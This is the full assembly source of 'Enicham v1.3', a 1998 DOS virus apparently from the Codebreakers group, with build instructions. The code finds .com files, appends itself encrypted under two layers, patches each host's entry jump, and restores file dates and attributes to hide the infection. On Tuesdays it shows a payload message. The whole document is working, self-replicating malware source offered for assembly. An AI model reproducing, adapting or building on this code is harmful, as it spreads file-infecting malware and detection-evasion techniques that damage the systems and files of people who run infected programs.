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synced 2025-02-22 22:53:41 +00:00
231 lines
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231 lines
13 KiB
; ------------------------------------------------------------------------- ;
; Enicham v1.3 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: `-------------------| Started: 17/06/98 | Finished: 18/06/98 ;
; `-------------------^------------------- ;
; v1.0 - runtime .com appender with one layer of encryption | Size: 543 ;
; v1.1 - restores time/date & attributes + infects readonly `---------- ;
; v1.2 - add second layer of XOR,NEG,NOT,ROR,ROL encryption ;
; v1.3 - add small payload, show our presence every tuesday ;
; ------------------------------------------------------------------------- ;
; ---------------------> This Is For Christine Moore <--------------------- ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm enicham.asm ;
; to link :::::] tlink /t enicham.obj ;
; ------------------------------------------------------------------------- ;
code segment ; name our segment 'code'
assume cs:code,ds:code ; assign CS and DS to code
org 100h ; this be a .com file
jumps ; save space jumping
blank: db 0e9h,0,0 ; jump to start of code
start: call delta ; push IP on to stack
delta: pop bp ; pop it into BP
sub bp,offset delta ; get the delta offset
decr: jmp once ; jump to once (overwritten)
lea si,[bp+encd] ; start of encrypted stuff
mov di,si ; move si into di
call encr ; call our decryption loop
; -------------------( Start Of 1st Encryption Blanket )------------------- ;
; ------------------------------------------------------------------------- ;
encd: lea si,[bp+d_encd] ; start address of layer 2
mov di,si ; move it into DI
mov cx,d_encr-d_encd ; # of bytes to decrypt
call d_encr ; second layer decrypted
; -------------------( Start Of 2nd Encryption Blanket )------------------- ;
; ------------------------------------------------------------------------- ;
d_encd: lea si,[bp+thrbyte] ; what bytes to restore
mov di,100h ; where to restore them
push di ; push 100h on to stack
movsw ; move two bytes
movsb ; move one byte
lea dx,[bp+offset dta] ; where to put the DTA
mov ah,1ah ; move the DTA
int 21h ; it's moved now
mov ah,4eh ; find first file
lea dx,[bp+comfile] ; with extension .com
mov cx,7 ; possible attributes
find: int 21h ; find the file
jc exit ; no files found, exit
lea dx,[bp+offset dta+1eh] ; get the file info
mov ax,4300h ; get file attributes
int 21h ; get them now
push cx ; push the attributes
push dx ; push the file name
mov ax,4301h ; set file attributes
xor cx,cx ; to none at all
int 21h ; set them now
mov ax,3d02h ; open the file
int 21h ; it is open now
xchg bx,ax ; move the info
mov ax,5700h ; get time / date
int 21h ; we have them now
push dx ; push the date
push cx ; push the time
mov ah,3fh ; read from file
lea dx,[bp+thrbyte] ; read into here
mov cx,3 ; read three bytes
int 21h ; got the first three
mov ax,word ptr [bp+dta+1ah] ; get file size
mov cx,word ptr [bp+thrbyte+1] ; move thrbyte+1 into CX
add cx,finished-start+3 ; get virus + jump size
cmp ax,cx ; compare the two
jz close ; if equal, close file
cmp ax,1000 ; file is > then 1kb ?
jb close ; to small, close it
cmp ax,62000 ; file is < then 62kb ?
ja close ; to big, close it up
sub ax,3 ; get size of main jump
mov word ptr [bp+newjump+1],ax ; write it into newjump
mov ax,4200h ; scan to start of file
xor cx,cx ; xor value of cx to 0
cwd ; likewize for dx
int 21h ; pointing to SOF
mov ah,40h ; write to file
lea dx,[bp+newjump] ; write the jump
mov cx,3 ; # of bytes to write
int 21h ; write them now
mov ax,4202h ; scan to end of file
xor cx,cx ; xor value of cx to 0
cwd ; likewize for dx
int 21h ; pointing to EOF
lea si,[bp+start] ; load the source index
lea di,[bp+buffer] ; load the desination index
mov cx,finished-start ; # of bytes to move
rep movsb ; load it into memory
lea si,[bp+d_encd-start+buffer] ; load the source index
mov cx,d_encr-d_encd ; # of bytes to encrypt
mov di,si ; move SI into DI
call d_encr ; encrypt 1st layer
lea di,[bp+encd-start+buffer] ; load the desination index
mov si,di ; move it into SI
mov cx,encr-encd ; # of bytes to encrypt
call encr ; encrypt 2nd layer
mov ah,40h ; write to file
mov cx,finished-start ; # of bytes to write
lea dx,[bp+buffer] ; start of virus in mem
int 21h ; write it now
close: mov ax,5701h ; set time / date
pop cx ; pop the time
pop dx ; pop the date
int 21h ; restore time/date files
mov ax,4301h ; set attributes
pop dx ; for this file
pop cx ; with these attributes
int 21h ; restore them now
mov ah,3eh ; close the file
int 21h ; file is closed
mov ah,4fh ; find next file
jmp find ; find it now
exit: mov ah,2ah ; get system time
int 21h ; we have it now
cmp al,004h ; is it tuesday?
jne endit ; nope, end this
mov ah,09h ; print a message
lea dx,[bp+pldmsg] ; our payload message
int 21h ; print it now
mov ah,00h ; wait for keypress
int 16h ; anounce our presence
endit: mov ah,1ah ; set DTA location
mov dx,80h ; to this location
int 21h ; restore DTA
retn ; return control to host
; ----------------------------( The Data Area )---------------------------- ;
; ------------------------------------------------------------------------- ;
pldmsg db '',10,13
db ' Infected with :: Enihcam :: written by KilJaeden of the Codebreakers 1998',10,13,'$'
thrbyte db 0cdh,20h,0 ; terminates 1st gen
newjump db 0e9h,0,0 ; blank jump 1st gen
comfile db "*.com",0 ; extension to search for
dta db 43 dup (?) ; space for DTA
; --------------------( End Of 2nd Encryption Blanket )-------------------- ;
; ------------------------------------------------------------------------- ;
d_encr: lodsb ; load a byte
xor al,0C4h ;------[1]
neg al ;-----[2]
ror al,4 ;----[3]
not al ;---[4]
rol al,4 ;--[5]
neg al ;-[6] encryption/decryption
rol al,4 ;--[5]
not al ;---[4]
ror al,4 ;----[3]
neg al ;-----[2]
xor al,0C4h ;------[1]
stosb ; store the byte
loop encr ; do all the bytes
ret ; return from call
; --------------------( End Of 1st Encryption Blanket )-------------------- ;
; ------------------------------------------------------------------------- ;
encr: lodsb ; load a byte
neg al ;------[1]
ror al,4 ;-----[2]
not al ;----[3]
neg al ;---[4]
rol al,4 ;--[5]
xor al,0C4h ;-[6] encryption/decryption
rol al,4 ;--[5]
neg al ;---[4]
not al ;----[3]
ror al,4 ;-----[2]
neg al ;------[1]
stosb ; store the byte
loop encr ; do all the bytes
ret ; return from call
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
buffer: ; save our virus in mem
finished: ; offset label for virus end
once: lea si,[bp+new] ; load source index
lea di,[bp+decr] ; load destination index
movsw ; move two bytes
movsb ; move one byte
jmp d_encd ; jump to encrypted area
new: mov cx,encr-encd ; this replaces the jump
code ends ; end code segment
end blank ; end / where to start
; ------------------------------------------------------------------------- ;
; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
; ------------------------------------------------------------------------- ;